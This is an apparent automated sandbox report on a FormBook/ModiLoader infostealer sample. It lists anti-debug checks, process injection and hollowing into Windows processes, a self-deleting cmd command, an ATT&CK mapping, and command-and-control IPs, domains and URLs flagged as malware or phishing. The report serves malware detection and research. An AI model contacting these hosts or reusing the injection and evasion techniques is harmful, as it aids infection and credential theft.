              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h]3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h]3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h]3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h]3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h]3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h]3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h]3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h]3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F626 mov eax, dword ptr fs:[00000030h]3_2_1E62F626
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E705636 mov eax, dword ptr fs:[00000030h]3_2_1E705636
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661607 mov eax, dword ptr fs:[00000030h]3_2_1E661607
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66F603 mov eax, dword ptr fs:[00000030h]3_2_1E66F603
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633616 mov eax, dword ptr fs:[00000030h]3_2_1E633616
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633616 mov eax, dword ptr fs:[00000030h]3_2_1E633616
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C36EE mov eax, dword ptr fs:[00000030h]3_2_1E6C36EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C36EE mov eax, dword ptr fs:[00000030h]3_2_1E6C36EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C36EE mov eax, dword ptr fs:[00000030h]3_2_1E6C36EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C36EE mov eax, dword ptr fs:[00000030h]3_2_1E6C36EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C36EE mov eax, dword ptr fs:[00000030h]3_2_1E6C36EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C36EE mov eax, dword ptr fs:[00000030h]3_2_1E6C36EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D6E0 mov eax, dword ptr fs:[00000030h]3_2_1E65D6E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D6E0 mov eax, dword ptr fs:[00000030h]3_2_1E65D6E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6636EF mov eax, dword ptr fs:[00000030h]3_2_1E6636EF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6ED6F0 mov eax, dword ptr fs:[00000030h]3_2_1E6ED6F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63B6C0 mov eax, dword ptr fs:[00000030h]3_2_1E63B6C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63B6C0 mov eax, dword ptr fs:[00000030h]3_2_1E63B6C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63B6C0 mov eax, dword ptr fs:[00000030h]3_2_1E63B6C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63B6C0 mov eax, dword ptr fs:[00000030h]3_2_1E63B6C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63B6C0 mov eax, dword ptr fs:[00000030h]3_2_1E63B6C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63B6C0 mov eax, dword ptr fs:[00000030h]3_2_1E63B6C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F16CC mov eax, dword ptr fs:[00000030h]3_2_1E6F16CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F16CC mov eax, dword ptr fs:[00000030h]3_2_1E6F16CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F16CC mov eax, dword ptr fs:[00000030h]3_2_1E6F16CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F16CC mov eax, dword ptr fs:[00000030h]3_2_1E6F16CC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF6C7 mov eax, dword ptr fs:[00000030h]3_2_1E6EF6C7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6616CF mov eax, dword ptr fs:[00000030h]3_2_1E6616CF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62D6AA mov eax, dword ptr fs:[00000030h]3_2_1E62D6AA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62D6AA mov eax, dword ptr fs:[00000030h]3_2_1E62D6AA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6276B2 mov eax, dword ptr fs:[00000030h]3_2_1E6276B2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6276B2 mov eax, dword ptr fs:[00000030h]3_2_1E6276B2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6276B2 mov eax, dword ptr fs:[00000030h]3_2_1E6276B2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B368C mov eax, dword ptr fs:[00000030h]3_2_1E6B368C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B368C mov eax, dword ptr fs:[00000030h]3_2_1E6B368C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B368C mov eax, dword ptr fs:[00000030h]3_2_1E6B368C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B368C mov eax, dword ptr fs:[00000030h]3_2_1E6B368C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62B765 mov eax, dword ptr fs:[00000030h]3_2_1E62B765
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62B765 mov eax, dword ptr fs:[00000030h]3_2_1E62B765
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62B765 mov eax, dword ptr fs:[00000030h]3_2_1E62B765
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62B765 mov eax, dword ptr fs:[00000030h]3_2_1E62B765
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643740 mov eax, dword ptr fs:[00000030h]3_2_1E643740
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643740 mov eax, dword ptr fs:[00000030h]3_2_1E643740
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643740 mov eax, dword ptr fs:[00000030h]3_2_1E643740
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D375F mov eax, dword ptr fs:[00000030h]3_2_1E6D375F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D375F mov eax, dword ptr fs:[00000030h]3_2_1E6D375F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D375F mov eax, dword ptr fs:[00000030h]3_2_1E6D375F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D375F mov eax, dword ptr fs:[00000030h]3_2_1E6D375F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D375F mov eax, dword ptr fs:[00000030h]3_2_1E6D375F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703749 mov eax, dword ptr fs:[00000030h]3_2_1E703749
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF72E mov eax, dword ptr fs:[00000030h]3_2_1E6EF72E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633720 mov eax, dword ptr fs:[00000030h]3_2_1E633720
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64F720 mov eax, dword ptr fs:[00000030h]3_2_1E64F720
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64F720 mov eax, dword ptr fs:[00000030h]3_2_1E64F720
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64F720 mov eax, dword ptr fs:[00000030h]3_2_1E64F720
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F972B mov eax, dword ptr fs:[00000030h]3_2_1E6F972B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70B73C mov eax, dword ptr fs:[00000030h]3_2_1E70B73C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70B73C mov eax, dword ptr fs:[00000030h]3_2_1E70B73C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70B73C mov eax, dword ptr fs:[00000030h]3_2_1E70B73C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70B73C mov eax, dword ptr fs:[00000030h]3_2_1E70B73C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629730 mov eax, dword ptr fs:[00000030h]3_2_1E629730
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629730 mov eax, dword ptr fs:[00000030h]3_2_1E629730
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665734 mov eax, dword ptr fs:[00000030h]3_2_1E665734
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63973A mov eax, dword ptr fs:[00000030h]3_2_1E63973A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63973A mov eax, dword ptr fs:[00000030h]3_2_1E63973A
              Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068B9AA0 rdtsc 3_2_068B9AA0
              Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_1E672EA0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 37.97.254.27 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 62.72.50.88 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 156.237.159.158 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 104.140.89.24 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 104.247.81.50 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 34.93.103.39 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 68B0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000 protect: page execute and read and write
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 68B0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000 value starts with: 4D5AJump to behavior
              Sample uses process hollowing technique
              Source: C:\Windows\SysWOW64\colorcpl.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: C00000Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 590000
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 68B0000Jump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\colorcpl.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 4004Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4004Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 4004
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
              Source: explorer.exe, 00000005.00000002.4615728085.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324740803.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
              Source: explorer.exe, 00000005.00000000.2326909067.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4618461072.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4615728085.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000005.00000002.4615728085.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324740803.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4611738332.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
              Source: explorer.exe, 00000005.00000002.4615728085.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324740803.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000005.00000002.4623300730.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2336924818.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_032B5DDC
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: GetLocaleInfoA,0_2_032BB910
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: GetLocaleInfoA,0_2_032BB8C4
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_032B5EE8
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032BA30C GetLocalTime,0_2_032BA30C
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_033195F8 GetVersion,0_2_033195F8

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              1
              Valid Accounts              		1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              Credential API Hooking              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium3
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
              Default Accounts1
              Shared Modules              		1
              Valid Accounts              		1
              Valid Accounts              		3
              Obfuscated Files or Information              		11
              Input Capture              		1
              System Network Connections Discovery              		Remote Desktop Protocol1
              Screen Capture              		Exfiltration Over Bluetooth1
              Encrypted Channel              		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain AccountsAt1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		1
              DLL Side-Loading              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Credential API Hooking              		Automated Exfiltration3
              Non-Application Layer Protocol              		Data Encrypted for ImpactDNS ServerEmail Addresses
              Local AccountsCronLogin Hook812
              Process Injection              		1
              Rootkit              		NTDS124
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		Traffic Duplication13
              Application Layer Protocol              		Data DestructionVirtual Private ServerEmployee Names
              Cloud AccountsLaunchdNetwork Logon Script1
              Registry Run Keys / Startup Folder              		11
              Masquerading              		LSA Secrets331
              Security Software Discovery              		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
              Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Valid Accounts              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
              External Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
              Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
              Virtualization/Sandbox Evasion              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
              Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt812
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
              Supply Chain CompromisePowerShellCronCron1
              Rundll32              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1350545 Sample: Fpopgapwdcgvxn.exe Startdate: 30/11/2023 Architecture: WINDOWS Score: 100 44 www.thnkotb.com 2->44 46 www.stellarskyline.com 2->46 48 17 other IPs or domains 2->48 56 Snort IDS alert for network traffic 2->56 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 8 other signatures 2->62 11 Fpopgapwdcgvxn.exe 1 2 2->11         started        signatures3 process4 file5 42 C:\Users\Public\Libraries\Telragab.PIF, PE32 11->42 dropped 82 Drops PE files with a suspicious file extension 11->82 84 Writes to foreign memory regions 11->84 86 Allocates memory in foreign processes 11->86 88 2 other signatures 11->88 15 colorcpl.exe 2 11->15         started        signatures6 process7 signatures8 90 Modifies the context of a thread in another process (thread injection) 15->90 92 Maps a DLL or memory area into another process 15->92 94 Sample uses process hollowing technique 15->94 96 2 other signatures 15->96 18 explorer.exe 12 4 15->18 injected process9 dnsIp10 50 kermisbedrijfkramer.online 37.97.254.27, 49752, 80 TRANSIP-ASAmsterdamtheNetherlandsNL Netherlands 18->50 52 www.harmonicod.com 104.247.81.50, 49751, 80 TEAMINTERNET-CA-ASCA Canada 18->52 54 5 other IPs or domains 18->54 64 System process connects to network (likely due to code injection or exploit) 18->64 22 Telragab.PIF 18->22         started        25 rundll32.exe 18->25         started        27 Telragab.PIF 18->27         started        29 chkdsk.exe 18->29         started        signatures11 process12 signatures13 66 Multi AV Scanner detection for dropped file 22->66 68 Machine Learning detection for dropped file 22->68 70 Writes to foreign memory regions 22->70 80 2 other signatures 22->80 31 colorcpl.exe 22->31         started        72 Modifies the context of a thread in another process (thread injection) 25->72 74 Maps a DLL or memory area into another process 25->74 76 Tries to detect virtualization through RDTSC time measurements 25->76 34 cmd.exe 1 25->34         started        78 Allocates many large memory junks 27->78 36 SndVol.exe 27->36         started        38 WerFault.exe 27->38         started        process14 signatures15 98 Modifies the context of a thread in another process (thread injection) 31->98 100 Maps a DLL or memory area into another process 31->100 102 Sample uses process hollowing technique 31->102 40 conhost.exe 34->40         started        process16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Fpopgapwdcgvxn.exe70%ReversingLabsWin32.Trojan.ModiLoader
              Fpopgapwdcgvxn.exe69%VirustotalBrowse
              Fpopgapwdcgvxn.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\Telragab.PIF100%Joe Sandbox ML
              C:\Users\Public\Libraries\Telragab.PIF70%ReversingLabsWin32.Trojan.ModiLoader

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              leathfortexas.com10%VirustotalBrowse
              thnkotb.com4%VirustotalBrowse
              www.hivaom.top0%VirustotalBrowse
              www.maltsky.net7%VirustotalBrowse
              kermisbedrijfkramer.online9%VirustotalBrowse
              stellarskyline.com6%VirustotalBrowse
              www.harmonicod.com1%VirustotalBrowse
              www.thnkotb.com0%VirustotalBrowse
              www.stellarskyline.com0%VirustotalBrowse
              www.leathfortexas.com3%VirustotalBrowse
              www.sprockettrucking.com1%VirustotalBrowse
              www.kermisbedrijfkramer.online1%VirustotalBrowse
              www.ouxodb001.cfd1%VirustotalBrowse
              www.optimusvisionlb.com0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://word.office.comM0%URL Reputationsafe
              https://outlook.come0%URL Reputationsafe
              http://schemas.micro0%URL Reputationsafe
              http://www.hivaom.topReferer:0%Avira URL Cloudsafe
              http://www.thnkotb.com0%Avira URL Cloudsafe
              http://www.canwealljustagree.comReferer:0%Avira URL Cloudsafe
              http://www.harmonicod.com/ao65/100%Avira URL Cloudmalware
              http://www.oaistetic.comReferer:0%Avira URL Cloudsafe
              http://www.canwealljustagree.com/ao65/100%Avira URL Cloudmalware
              http://www.ecofare.xyz/ao65/100%Avira URL Cloudphishing
